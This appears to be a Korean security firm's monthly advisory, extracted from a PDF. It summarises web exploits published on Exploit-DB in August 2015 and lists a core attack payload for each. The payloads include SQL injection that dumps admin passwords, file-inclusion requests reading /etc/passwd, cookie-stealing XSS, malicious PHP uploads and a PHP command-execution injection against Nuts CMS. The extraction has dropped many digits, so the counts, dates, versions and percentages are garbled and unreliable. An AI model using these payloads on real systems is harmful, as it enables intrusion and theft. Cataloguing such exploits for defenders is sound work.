EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

Size: px

Start display at page:

Download "EDB 분석보고서 (05.08) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중."

유준 망절
7 years ago
Views:

1 EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 8 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 분석된 공격들은주로특정웹어플리케이션의구조적인특성상발생하는들이거나구현이쉬운공격들이대부분이었습니다. 그러나 자체는공격의특성상공격이성공하게되면제 차공격이들어오게되고, 그로인해시스템의중요한정보나개인정보가노출될수있으므로그위험도는매우높은공격에해당됩니다. 로그인페이지나게시판과같은기본적인페이지에단순한쿼리로인해공격에노출되지않도록항상주의해야합니다. 주요소프트웨어별발생현황을보면 가가장많은개수의이발견되었습니다. 를사용하는관리자는사이트의 Plugin 을점검하여사이트가이발견된 Plugin 을사용하고있다면해당 Plugin 을최신버전으로업데이트하셔야합니다.. 별보고개수 보고개수 Code File Upload LFI 7 XSS 6 총합계 별보고개수 6 7 Code File Upload LFI XSS. 위험도별분류 위험도 보고개수 백분율 상.68% 중 76.% 합계 % 위험도별분류 상 중. 공격난이도별현황공격난이도 보고개수 백분율 상 7.8% 중.68% 하 6 68.% 총합계 % 공격난이도별현황 6 상 중 하. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time CodoForum Aruba Mobility Controller 총합계 8 주요소프트웨어별발생현황 PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류공격난이도 공격위험도 이름 소프트웨어이름 77 상 상 Video Gallery.7 - admin-ajax.php 775 LFI 하 상 Candidate Application Form Plugin LFI 하 상 Simple Image Manipulator Plugin.0 - download.php LFI 775 LFI 하상 Recent Backups Plugin download-file.php LFI 775 LFI 하 상 TF Image Gallery.0 - ajax_load.php LFI 78 하 중 Plugin 5. - forum_functions.php 78 하 중 Plugin 5. -get_album_item.php 78 하 중 Plugin 5. - get_album_item.php 706 XSS 하 중 Googmonify Plugin options-general.php XSS

2 EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.0. File Upload Filter Bypass Remote PHP Code Execution - /microweber-latest/ File Upload POST /microweberlatest/plupload?token= &path=media%555clocalhost%555 C&path=media%55Clocalhost%55Cuploaded%55C HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd0008f dd0008f Content-Disposition: form-data; name="fil"; filename="phpinfo.php" dd0008f-- 7/08/05 77 XSS 하중.0. - Stored XSS And CSRF Add Admin Exploit - /microweberlatest/api/save_option XSS POST /microweber-latest/api/save_option HTTP/..0. option_key=website_keywords&option_group=website&o ption_value="><img src=j onerror=confirm("zsl")> 7/08/ 중중 PHP News Script allgallery.php /demo/allgallery.php?id=- 00%7+union+select+user()% PHP News Script PHP News Script.0.0 /08/05 77 상상 /wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(8,, 85, 78, 7, 7, 78,, 8, 6, 76, 6, 67, 8,, 67, 7, 78, 67, 65, 8, 0, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 57, 55,,, 5, 56,,, 5, 57,,, 5, 56,,,, 50, 5,,,,, 5,,, 5, 56,,, 5, 57,,, 5, 5,,, 5, 56,,, 5, 5,,,, 8, 5,,,,,,,,,,,,,, 8, 5,,,, 8, 56,,,, 8,,,, 57, 55,,,, 8, 8,,,,, 5,,,, 8,,,,, Video Gallery.7 -, 8,,,,, 5,,,, 8,,,, 57, admin-ajax.php 취 5,,, 57, 57,,,,,,,,, 8, 8, 약점,,, 8,,,, 5, 5,,, 5, 57,,,,, 5,,, 5, 56,,, 7, 5,, 67, 7, 65, 8,,,, 76, 6, 78, 7, 8, 7, 0, 7, 5, 0,, 5,, 7, 5, 5,,,, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 5, 56,,, 5, 5,,, 7, 5,, 67, 7, 65, 8,,,, 7, 5, 0,, 5,, 7, 5, 5,,, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 5, 5,,, 5, 57,,,, 50, 5,,, 7, 5,, 67, 7, 65, 8,,,, 70, 8, 7, 77,,,, 5, 7, 5, 0,, 5,, 87, 7, 6, 8, 6,, 7, 68,, 6,, ) as CHAR) Video Gallery.7 0/08/ LFI 하 상 0/08/ 상 상 0/08/ LFI 하 상 0/08/ LFI 하 상 0/08/ LFI 하 상 Candidate Application Form Plugin article.php Simple Image Manipulator Plugin.0 - download.php LFI Recent Backups Plugin download-file.php LFI TF Image Gallery.0 - ajax_load.php LFI /wp-content/plugins/candidate-applicationform/downloadpdffile.php?filename=../../../../../../../../../.. /etc/passwd /wds_news/article.php?id=- +union+select+,group_concat(username,0xa,passwor d),,,5,6,7,8,,0+from+cms_admin-- /wp-content/plugins/./simple-imagemanipulator/controller/download.php?filepath=/etc/passwd /wp-content/plugins/recent-backups/downloadfile.php?file_link=/etc/passwd /wp-content/plugins/wptf-image-gallery/libmbox/ajax_load.php?url=/etc/passwd Candidate Application Form Plugin.0 Simple Image Manipulator Plugin.0 Recent Backups Plugin 0.7 TF Image Gallery.0

3 EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 /08/ 상상 Event Manager.. - index.php POST /joomla../index.php?option=com_jem&view=myevents &Itemid=5 HTTP/. filter=&filter_search=&limit=0&cid%5b%5d=,)%0 AND%0(SELECT%065%0FROM(SELECT%0COUN T(*),CONCAT(VERSION(),FLOOR(RAND(0)*))x%0FROM %0INFORMATION_SCHEMA.TABLES%0GROUP%0BY %0x)a)%0AND%0(577=577&filter_order=a.dates &filter_order_dir=&enable address=0&boxchecked= &task=myevents.unpublish&option=com_jem&5c57c6e0 6bd6670f7b56ecaf= Event Manager.. 5/08/ 중중 com_informations component - index.php /index.php?option=com_informations&view=sousthemes& themeid=.+union+select+,,version()% com_informat ions component 5/08/ 중 중 5/08/ LFI 하 중 com_memorix component - index.php Picasaweb - plugins_player.php LFI /index.php?option=com_memorix&task=result&searchplu gin=theme&itemid=60&themeid=- 85+union+select+,,version(),,555,666,777,8 88,--+AbuHassan /plugins/gkplugins_picasaweb/plugins/plugins_player.php? f=../../../index.php com_memorix component Picasaweb 7/08/ Code 중상 Nuts CMS Remote - login.php Code /login.php?r=<?php+error_reporting(0);print(_nutcmsid_);sy stem(base6_decode(\$_server[http_cmd]));die;+?> Nuts Nuts CMS 8/08/05 78 하중 Plugin 5. - forum_functions.php POST /wordpress/wp-content/plugins/wpsymposium/ajax/forum_functions.php HTTP/. Cache-Control: no-cache Plugin 5. action=gettopic&topic_id= AND SLEEP(5)&group_id=0 CMS.. - /- /-CMS/site/index.php/admin/pages/view-tree/0' 8/08/05 78 중중 CMS/site/index.php/admin/page union all select,concat( , ":", s/view-tree/ 취약 password),,,5,6,7,8,,0 from 점 bigtree_users %/ CMS.. 8/08/05 78 하중 CMS.. - /- CMS/site/index.php/admin/ajax /pages/get-seo-score POST /-CMS/site/index.php/admin/ajax/pages/getseo-score HTTP/. CMS.. content=foo&resources=bar&id=foo' or =%&title=trees of All Sizes 8/08/ 하중 CodoForum.. - index.php /codoforum/index.php?u=/page/6 and =%/terms-ofservice CodoForum CodoForum.. 8/08/ XSS 중중 PHPfileNavigator.. - navega.php XSS../navega.php?PHPSESSID=HELL&dir= tor or.. 8/08/ XSS 중중 PHPfileNavigator.. - accion.php XSS../accion.php?accion=buscador&PHPSESSID=HELL&dir= tor or.. 8/08/ XSS 중중 PHPfileNavigator.. - preferencias.php XSS../preferencias.php?PHPSESSID=HELL&dir= tor or.. 8/08/05 78 하중 8/08/05 78 하중 /08/ XSS 하중 Plugin 5. - get_album_item.php Plugin 5. - get_album_item.php up.time main.php XSS /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%% 0;%0-- /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%% 0;%0-- /main.php?section=usercontainer&subsection=edit7bef8 %5c%5ftitle%5e%5cscript%5ealert%58 %5%5c%5fscript%5ea05&id=6&name=T estingus Plugin 5. Plugin 5. up.time up.time 7.5.0

4 EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 0/08/05 78 XSS 중 중 /screens/switch/switch_mon.html?mode=plogcustom&mode-title=test</td><img width= height= Mobility Aruba Aruba Aruba Mobility Controller Mobility - switch_mon.html XSS src=/images/logo-mobility-controller.gif Controller Controller onload=alert(document.cookie)> POST /webupgrade/webupgrade.php HTTP/. /08/05 78 하 중 webupgrade.php.0.8 step=&login='&password='&show_advanced_output= /08/05 77 하중.0. - load_logfiles.php /remotereporter/load_logfiles.php?server=%0and%0 =&url=a.0. /08/05 76 하중 verification.php POST /webadmin/auth/verification.php HTTP/ login= and =-- /08/05 76 하중 index.php POST /webadmin/deny/index.php HTTP/ dpid= and =-- /08/ XSS 하중 Googmonify Plugin options-general.php XSS POST /wp-admin/optionsgeneral.php?page=googmonify.php HTTP/. Googmonify Plugin 0.8. PID="><script>alert(document.cookie)</script>&Limit=0&A nalytics=0&aid="><script>alert(/ehsan Hosseini/)</script>&GoogmonifyUpdate=Update Options» 8/08/ LFI 하상 CMS.7. - admin.php LFI POST /pluck/admin.php?action=language HTTP/. CMS.7. cont=../../../../../../../etc/passwd&save=save 8/08/ File Upload 하중 CMS.7. - admin.php File Upload POST /pluck/admin.php?action=files HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd0008f CMS dd0008f Content-Disposition: form-data; name="fil"; filename="phpinfo.php5" dd0008f--

5 EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 8/08/ XSS 하중 CMS.7. - admin.php XSS POST /pluck/admin.php?action=images HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd0008f CMS dd0008f Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(7)>.png" dd0008f-- 8/08/ XSS 하중 CMS.7. - admin.php XSS () POST /pluck/admin.php?action=language HTTP/. CMS.7. title=hello&seo_name=&content=<script>alert(7)</s cript>&description=&keywords=&hidden=no&sub_page=& theme=default&save=save 8/08/ File Upload 하중 POST /wolfcms/?/admin/plugin/file_manager/browse/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Wolf CMS - /wolfcms/?/admin/plugin/file_m dd0008f anager/browse/ File Upload Wolf Wolf CMS dd0008f Content-Disposition: form-data; name="imagefile"; filename="hello.php" dd0008f-- /08/ XSS 하중 /08/ LFI 하중 /08/ XSS 하중 PhpWiki.5. - index.php XSS PhpWiki.5. - index.php LFI PhpWiki.5. - index.php XSS () /phpwiki/index.php?pagename=%c%fscript%e%c script%ealert%8document.cookie%%c%fscript %E%C!-- /phpwiki/index.php/phpwikiadministration?action=loadfile &overwrite=&source=/etc/group POST /phpwiki/index.php/userpreferences HTTP/. PhpWiki PhpWiki.5. PhpWiki PhpWiki.5. PhpWiki PhpWiki.5. pagename=userpreferencesabc<script><script>alert documentcookie&#;<script><&#;& #5;

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.